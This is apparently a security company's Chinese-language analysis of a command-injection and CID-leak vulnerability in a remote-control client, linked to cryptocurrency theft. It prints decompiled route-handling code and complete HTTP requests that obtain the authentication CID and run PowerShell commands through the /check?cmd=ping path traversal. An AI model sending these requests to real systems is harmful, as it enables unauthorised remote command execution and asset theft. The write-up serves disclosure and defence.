最近,一些 web3 加密货币持有者报告说在使用远程控制软件时丢失了他们的数字资产。
与黑客关联的钱包地址是0xbb3fd383d1c5540e52ef0a7bcb9433375793aeaf。
去年曾发生过远程控制软件因客户端识别信息(CID)泄露和命令注入漏洞(CNVD-2022-10270/CNVD-2022-03672)导致服务爆炸的事件。
每当软件启动时,它会自动打开一个大于 40000 的随机端口号作为 HTTP 服务。如果/check 路径中参数cmd 值以ping 或nslookup 开头,则可以执行任何命令。
这允许攻击者发送 C2 代理,使他们能够在很长一段时间内监视受害者的系统。
Windows 个人版 <= 11.0.0.33162
简易版 <= V1.0.1.43315
我们来看看login.cgi
v5 = (__int64 (__fastcall *)())operator new(0x50ui64); v55 = v5; v54 = 15i64; v53 = 0i64; v51[0] = 0; sub_1400F0690(v51, "login.cgi", 9ui64); v6 = sub_140E2D6BC(v5, v51); v57 = &off_1410D3B20; v58 = (char (__fastcall *)(__int64, __int64))sub_140E1EE50; v59 = v52; v60 = a1; v61 = &v57; v66 = (_QWORD *)v6; if ( v6 ) { v7 = v6 + 8 + *(int *)(*(_QWORD *)(v6 + 8) + 4i64); (*(void (__fastcall **)(__int64))(*(_QWORD *)v7 + 8i64))(v7); } sub_140E2D85C(a1 + 55, &v66, &v57); LOBYTE(v8) = 1; sub_1400EEDC0(v51, v8, 0i64); v56 = &v57; v9 = (__int64 (__fastcall *)())operator new(0x50ui64); v55 = v9; v54 = 15i64; v53 = 0i64; v51[0] = 0; sub_1400F0690(v51, (void *)"cgi-bin/login.cgi", 0x11ui64); v10 = sub_140E2D6BC(v9, v51); v57 = &off_1410D3B20; v58 = (char (__fastcall *)(__int64, __int64))sub_140E1EE50; v59 = v52; v60 = a1; v61 = &v57; v66 = (_QWORD *)v10; if ( v10 ) { v11 = v10 + 8 + *(int *)(*(_QWORD *)(v10 + 8) + 4i64); (*(void (__fastcall **)(__int64))(*(_QWORD *)v11 + 8i64))(v11); } sub_140E2D85C(a1 + 55, &v66, &v57); LOBYTE(v12) = 1; sub_1400EEDC0(v51, v12, 0i64); v56 = &v57; v13 = (__int64 (__fastcall *)())operator new(0x50ui64); v55 = v13; v54 = 15i64; v53 = 0i64; v51[0] = 0; sub_1400F0690(v51, (void *)"cgi-bin/rpc", 0xBui64); v14 = sub_140E2D6BC(v13, v51); v57 = &off_1410D3B20; v58 = sub_140E1C954; v59 = v52; v60 = a1; v61 = &v57; v66 = (_QWORD *)v14; if ( v14 ) { v15 = v14 + 8 + *(int *)(*(_QWORD *)(v14 + 8) + 4i64); (*(void (__fastcall **)(__int64))(*(_QWORD *)v15 + 8i64))(v15); }
导航到 cgi-bin/rpc
得到以下路线
v63 = (*(__int64 (__fastcall **)(_QWORD))(**(_QWORD **)(a1 + 8) + 104i64))(*(_QWORD *)(a1 + 8)); sub_140320D80( (int)&qword_1414049C0, 1, (int)"..\\includes\\libsunloginclient\\client\\HttpDecideClientType.cpp", (int)"CHttpDecideTcpClientType::DecideClient", 205, "[Acceptor][HTTP] new RC HTTP connection %s,%s, plugin:%s, session:%s", v63); if ( (unsigned int)sub_140101DB0(v116, "login") && strcmp(v61, "express_login") && strcmp(v61, "cgi-bin/login.cgi") && strcmp(v61, "log") && strcmp(v61, "cgi-bin/rpc") && strcmp(v61, "transfer") && strcmp(v61, "cloudconfig") && strcmp(v61, "getfastcode") && strcmp(v61, "assist") && strcmp(v61, "cloudconfig") && strcmp(v61, "projection") && strcmp(v61, "getaddress") && strcmp(v61, "sunlogin-tools") ) ... sub_1400F05E0(v116); goto LABEL_168; } } if ( !(unsigned int)sub_140101DB0(v116, "login") || !(unsigned int)sub_140101DB0(v116, "control") || !strcmp(v61, "express_login") || !strcmp(v61, "cgi-bin/login.cgi") || !strcmp(v61, "cgi-bin/rpc") || !strcmp(v61, "desktop.list") || !strcmp(v61, "cloudconfig") || !strcmp(v61, "check") || !strcmp(v61, "transfer") || !strcmp(v61, "getfastcode") || !strcmp(v61, "assist") || !strcmp(v61, "micro-live/enable") || !strcmp(v61, "projection") || !strcmp(v61, "getaddress") ) { v103 = *(_QWORD *)(a1 + 8);
根据网上公开的漏洞信息,通过从cgi-bin/rpc路由获取第一个认证CID,可以通过检查action参数来区分功能。
当 action 参数设置为 verify-haras 时,该函数返回一个 verify_string。
if ( !(unsigned int)sub_140101DB0(v131, "verify-haras") ) { sub_1400F0690(Src, "{\"__code\":0,\"enabled\":\"1\",\"verify_string\":\"", 0x2Bui64); LOBYTE(v22) = 1; v23 = (*(__int64 (__fastcall **)(_QWORD, char *, __int64))(**(_QWORD **)(*(_QWORD *)(a1 + 416) + 288i64) + 144i64))( *(_QWORD *)(*(_QWORD *)(a1 + 416) + 288i64), v125, v22); sub_1400EEE40(Src, v23, 0i64, -1i64); sub_1400F05E0(v125); sub_1400EEC60(Src, "\",\"code\":0} ", 0xCui64); v73 = 1; CxxThrowException(&v73, (_ThrowInfo *)&stru_1412F7B30); }
如果 action 参数设置为 login-type,该函数将返回有关受害者设备的信息。
if ( !(unsigned int)sub_140101DB0(v131, "login-type") ) { sub_1405ACBA0(v93); v16 = "0"; if ( (*(unsigned __int8 (__fastcall **)(_QWORD))(**(_QWORD **)(*(_QWORD *)(a1 + 416) + 288i64) + 112i64))(*(_QWORD *)(*(_QWORD *)(a1 + 416) + 288i64)) ) ... memset(Buffer, 0, sizeof(Buffer)); sub_140150A60( Buffer, "{\"__code\":0,\"use_custom\":%d,\"code\":0,\"version\":\"%s\",\"isbinding\":%s,\"isinstalled\":%s,\"isprojection\"" ":%s,\"platform\":\"%s\",\"mac\":\"%s\",\"request_need_pwd\":\"%s\",\"accept_request\":\"1\",\"support_file\":\"1\"" ",\"disable_remote_bind\":\"%s\"} "); if ( Buffer[0] ) { do ++v6; while ( Buffer[v6] ); v4 = v6; } sub_1400F0690(Src, Buffer, v4); v72 = 1; CxxThrowException(&v72, (_ThrowInfo *)&stru_1412F7B30); }
除了上述之外,还有另外两个参数:fast-login和bind-request。
通过检查check路由,攻击者可以使用ping或nslookup创建恶意命令,从而实现远程命令执行。
getaddress 路由可以获取映射到外网固定端口的 https 服务地址。该地址很容易被网络资产搜索引擎抓取或被攻击者扫描,从而将攻击面扩大到内网之外。
每次启动时,rpc接口随机选择一个大于40000的端口号。
第一步是获取受影响的用户/实体的 CID。
GET /cgi-bin/rpc?action=verify-haras HTTP/1.1 Host: 10.211.55.3:49716 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close
之后,攻击者可以将 CID 添加到身份验证 cookie 中,如下所示:Cookie: CID=Pvqsv5f5QDs8vYotYsUEFvTkqJuKeZIS。这允许他们在受害者的计算机上执行任何命令。
GET /check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+whoami+/all HTTP/1.1 Host: 10.211.55.3:49716 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Cookie:CID=Pvqsv5f5QDs8vYotYsUEFvTkqJuKeZIS User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close
/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+ipconfig
访问和查看受害者的系统文件。
随着 web3 基础设施的不断发展,数字资产的高价值和 web3 基础设施的隐蔽性使其成为黑客的诱人目标。他们已经从传统的网络安全转向窃取 web3 生态系统内的数据,包括窃取用户的数字资产。
现在有很多黑客通过0-day/1-day攻击渗透到服务器、个人主机、钱包APP、手机客户端等目标设施。他们的最终目的是窃取用户的数字资产。
为防范此类攻击,建议用户保持系统更新和打补丁,避免点击来源不明的链接,并将密钥存储在隔离系统中。
随着 Web3 格局的不断扩大,项目必须优先考虑用户资产的安全,并采用行业最佳实践,例如全面审计和定期扫描弱点,以最大限度地减少未来发生类似攻击的可能性。
在此处详细了解我们的服务。